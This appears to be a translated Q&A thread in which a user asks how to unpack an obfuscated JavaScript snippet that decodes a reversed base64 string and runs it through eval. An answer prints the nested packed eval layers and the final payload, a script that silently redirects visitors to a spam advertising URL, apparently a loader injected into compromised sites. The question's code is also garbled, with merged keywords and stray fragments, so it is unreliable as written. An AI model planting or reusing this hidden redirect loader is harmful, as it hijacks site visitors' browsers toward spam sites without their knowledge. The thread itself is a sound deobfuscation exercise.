我怎样才能对这个JavaScript进行反混淆处理

时间:2015-10-06 19:16:34

标签: javascript deobfuscation

我一直试图对这个JS进行反混淆,但我一直在收到错误。我相信它使用了Dean Edwards打包机。我已经尝试将eval更改为console.log,以及一些在线解包器和malzilla。

有什么想法吗?

     var_0IO = 'KkSKpcCfngCdpxGcz5yJ4MDMwUHf05WZtV3YvRGf1cDMwUHfiZDMwUHf1MDMwUHfiNDMwUHfhZDMwUHf2MDMwUHfhNDMwUHflRXaydHfyFmd8VGchN2cl5Wd8VGchN2cl9Ff3IDMwUHflNDMwUHfyIDMwUHf3MDMwUHf2cDMwUHf4YDMwUHfkJDMwUHfkNDMwUHf3cDMwUHfjNDMwUHf2YDMwUHf4cDMwUHflZDMwUHf5cDMwUHflJDMwUHf8FGMwATd8VjNwATd8FjNwATd8JzNwATd8NjNwATd8NzNwATd8ZmNwATd8RjNwATd8ljNwATd8JjN8FDMxwnM0wHN3ADM1xnZyADM1xHM3ADM1x3Y2ADM1xHMyADM1xnNzwXNzwXZk92QyFGaD12byZGf0lGbwNHfn5WayR3UvRHf05WSlNnchBHfsFmdlx3dl5GfwhXRnVmU8VGbph2d8V2YhxGclJHfmlGfn5WayR3U852bpR3YuVnZ85mc1RXZyxHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHfnwiM2EDLyYDLnkSK9tHLwwSKnwFfnwFKPFjLnwFaywnayw3aywXbyw3bywHbyw3ZywnZywXYywHOywnYyw3YywXZywHZywnbyw3cywneyw3dywHeywXeywnQywXQywXdywXcywHcywndywncywHdywXayw3MywHVxwXOyw3TxwHUxwXUxwnRxwnTxwnUxwnSxw3SxwHSxwXSxw3RxwXTxw3UxwnNywnMywXVxwHNywXNywXMywHTxwHMyw3Vxw3NywnVxwHRxwHWxwXRxwHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8xHf8dCXskVMsoVMscCXpkSKnwFXcx3JcxFXoYTMucCXcxlaxwXaxw3axwHbxwnbxwXbxwHaxw3ZxwnYxwHcxw3YxwHZxwnZxwXZxw3bxwHdxwHexwXQxwnexw3QxwnQxwXexwndxwncxwXcxw3cxw3dxwXdxwXYxwHOxwXU8BFfSx3U8lTM8RFfPxXV81EfKx3S8x0JcxFXsgELIxyJcxFX7kSKzhCdoIkL6tzJcxFXcxFXcJXJwUSOlMTJhViYlcTJyUialEXJDVyalITJjVyMlgTJkVSYlETJmVCOlMWJoVCalYTJ3UCZlYTJjViYlQWJ4USMlYWJyUyZlYTJ1UyZlEWJxUyblETJyUiRlATJ5UyNlcTJBViMlATJxUSalUWJ1USNlUTJwVSRlUTJlVCMlETJzUSNlQWJEVCclkXJyUiMlgXJ5UCMlATJsVyalQTJtVCNlgWJxUSYlwWJlVSalgTJzUCMlYTJiVCOlMWJlViZlgTJ1USalMTJmVCNlQTJ0UCNlEXJyViblATJ5UyMlEWJiVyNlYTJvViNlUXJyUCMlcXJxUCMl4WJtVSMlkTJnVCMlQTJwUSOlMTJhViYlcTJqVyJcxFXcxFXc1zcgY3JcxFXo0HcgkUf9lSXjt1askyJcxFXndCXcxFLnwFXcJGXcxFXcxFXcdCXcx1KpMGKltyJcxFXixFXcxFXcxFXnwFXchCMxAiWoklLw1Dc7lSXjt1aoc1ep0SLjhCW70XKpETMoITMuMmOpcTMrMGK1EjLzEzP0EjPpEWJj1zYogyKpkSKh9yYoYFKlpzJcxFXnwFXc9TY8MGKJtXKjhyR9U2epQGLlxyasMGLhxCcocEKOdCXo0HcgQUM91XKdN2WrxSKnw1ZnwFLnwlYcxFXcdCXrkyYoU2KnwlYcxFXcdCXooUMgsUMogUMuAXPwtXKdN2WrhyRxsXKt0yYokUM70XM9M2O9dCXrcHXcxFXnwFRxsXKoUUM9U2Od1XXltFZgQUM7lSZoUUMb1za9lyYoUGf811YbtWPdlyYoU2WktXKt0yYokUM7lSKGFDLv41LogUMucCXnwVIocUM70XKpIVMo4UMuMmOpkjMrMGKQFjLGFzPRFjPpEWJj1zYogyKpkSKh9yYo0UMoUmOnw1Jc9TY8MGKEFzepMGKFFTPltXKkxSZssGLjxSYsAHKFFDKMFzJo0Hcg4mc1RXZy1Xfp01YbtGLpcyZnwyJixFXnsSKjhSZrciYcx1JoAHeFdWZSBydl5GKlNWYsBXZy5Cc9A3ep01YbtGKml2ep0SLjhSZslGa3tTfpkiNzgyZulmc0N1b05yY6kSOysyYoUGZvNkchh2Qt9mcm5yZulmc0N1P1MjPpEWJj1zYogyKpkSKh9yYoQnbJV2cyFGcoUmOncyPhxzYo4mc1RXZytXKjhibvlGdj5Wdm1TZ7lCZsUGLrxyYsEGLwhibvlGdj5WdmhCbhZXZ';
     functionOll(data)
     {
       var_01OlOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
       varo1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
       do
       {
         h1 = _01OlOI.indexOf(data.charAt(i++));
         h2 = _01OlOI.indexOf(data.charAt(i++));
         h3 = _01OlOI.indexOf(data.charAt(i++));
         h4 = _01OlOI.indexOf(data.charAt(i++));
         bits = h1
         << 18 | h2 << 12 | h3 << 6 | h4;
         o1=b its>> 16 & 0xff;
         o2 = bits >> 8 & 0xff;
         o3 = bits & 0xff;
         if (h3 == 64)
         {
           enc += String.fromCharCode(o1)
         }
         elseif(h4 == 64)
         {
           enc += String.fromCharCode(o1, o2)
         }
         else
         {
           enc += String.fromCharCode(o1, o2, o3)
         }

       }
       while (i
       < data.length);
       returnenc
     }
     function_01O(string)
     {
       varret='' , i=0 ;
       (HT) for (i=s tring.length - 1;
       i>= 0;
       i--)
       {
         ret += string.charAt(i);

       }
       returnret;

     }
     eval(Oll(_01O(_0IO)));

1 个答案:

答案 0 :(得分:-1)

有原始的反混淆代码。它需要更多的反混淆。

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1L(1E(p,a,c,k,e,d){e=1E(c){1D(c<a?\'\':e(1M(c/a)))+((c=c%a)>1Q?1F.1P(c+29):c.1N(1R))};1G(!\'\'.1H(/^/,1F)){1I(c--){d[e(c)]=k[c]||e(c)}k=[1E(e){1D d[e]}];e=1E(){1D\'\\\\w+\'};c=1};1I(c--){1G(k[c]){p=p.1H(1K 1J(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1D p}(\'N(G(p,a,c,k,e,d){e=G(c){I(c<a?\\\'\\\':e(V(c/a)))+((c=c%a)>14?13.15(c+17):c.12(11))};X(c--){W(k[c]){p=p.Y(Z 10(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}I p}(\\\'v s=\\\\\\\'%j%7%b%a%3%9%0%4%0%g%9%1%m%n%0%1%w%0%2%u%6%o%6%7%b%a%3%9%0%n%r%q%4%4%4%4%f%3%i%5%8%f%e%c%8%b%6%0%3%8%i%e%l%a%1%h%4%m%4%k%l%0%0%9%x%2%2%y%p%D%d%5%3%1%0%e%5%E%p%5%5%5%e%i%1%0%2%A%7%7%9%0%F%2%1%o%1%a%g%5%6%g%2%f%1%8%d%b%c%6%d%7%6%h%h%c%8%f%1%a%d%8%3%c%2%k%C%q%j%2%7%b%a%3%9%0%r\\\\\\\';z.B(t(s));\\\',H,H,\\\'L|K|J|M|U|O|T|19|S|R|P|Q|18|1a|1u|1w|1s|1q|1r|1v|1y|1B|1C|1z|1A|1x|1t|1o|1e|1f|1d|1c|1p|1b|1g|1h|1m|1n|1l|1k|1i|1j\\\'.16(\\\'|\\\')))\',1Z,1Y,\'||||||||||||||||||||||||||||||||||||||||||1E|1X|1D|1V|27|1W|20|1L|21|25|24|1U|22|26|1S|1M|1G|1I|1H|1K|1J|1R|1N|1F|1Q|1P|1O|29|1T|23|2i|2t|2r|2v|2p|2q|2u|2A|2B|2y|2x|2w|2z|2s|2n|2d|2e|2c|2b|28|2a|2f|2g|2l|2o|2m|2k|2j|2h\'.1O(\'|\'),0,{}))',62,162,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|RegExp|new|eval|parseInt|toString|split|fromCharCode|35|36|u0020|u006c|u0070|u002f|u0074|42|101|62|u0069|u0064|u006f|u0073|u0063|u0072|u0061|u0065|u000a||u002e|u0079|u006e|u0078|u0066|u003c|u0077|u003d|u002d|u0068|u0076|u0037|u0022|u003e|u0027|_escape|unescape|var|write|u003a|u0036|u006a|u003b|u0035|u006b|u0075|document|u0038'.split('|')))

第二步就是这样:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('N(G(p,a,c,k,e,d){e=G(c){I(c<a?\'\':e(V(c/a)))+((c=c%a)>14?13.15(c+17):c.12(11))};X(c--){W(k[c]){p=p.Y(Z 10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}I p}(\'v s=\\\'%j%7%b%a%3%9%0%4%0%g%9%1%m%n%0%1%w%0%2%u%6%o%6%7%b%a%3%9%0%n%r%q%4%4%4%4%f%3%i%5%8%f%e%c%8%b%6%0%3%8%i%e%l%a%1%h%4%m%4%k%l%0%0%9%x%2%2%y%p%D%d%5%3%1%0%e%5%E%p%5%5%5%e%i%1%0%2%A%7%7%9%0%F%2%1%o%1%a%g%5%6%g%2%f%1%8%d%b%c%6%d%7%6%h%h%c%8%f%1%a%d%8%3%c%2%k%C%q%j%2%7%b%a%3%9%0%r\\\';z.B(t(s));\',H,H,\'L|K|J|M|U|O|T|19|S|R|P|Q|18|1a|1u|1w|1s|1q|1r|1v|1y|1B|1C|1z|1A|1x|1t|1o|1e|1f|1d|1c|1p|1b|1g|1h|1m|1n|1l|1k|1i|1j\'.16(\'|\')))',62,101,'||||||||||||||||||||||||||||||||||||||||||function|42|return|u002f|u0065|u0074|u0069|eval|u0064|u0072|u0063|u0070|u006f|u0061|u0020|parseInt|if|while|replace|new|RegExp|36|toString|String|35|fromCharCode|split|29|u006c|u0073|u002d|u003a|var|u006a|_escape|unescape|u0036|document|u0038|u006b|u0035|u003b|u0075|write|u003e|u0078|u0066|u006e|u0079|u000a|u002e|u003c|u0077|u0037|u0027|u0022|u0076|u0068|u003d'.split('|'),0,{}))

结果是:

<script type="text/javascript">
    window.location.href = 'http://675-diet.d87ddd.net/ussptk/everyday/weo-cla-safflower-oil/';
</script>

如果您关注该链接,您将获得很少的重定向,并将访问一些广告网站。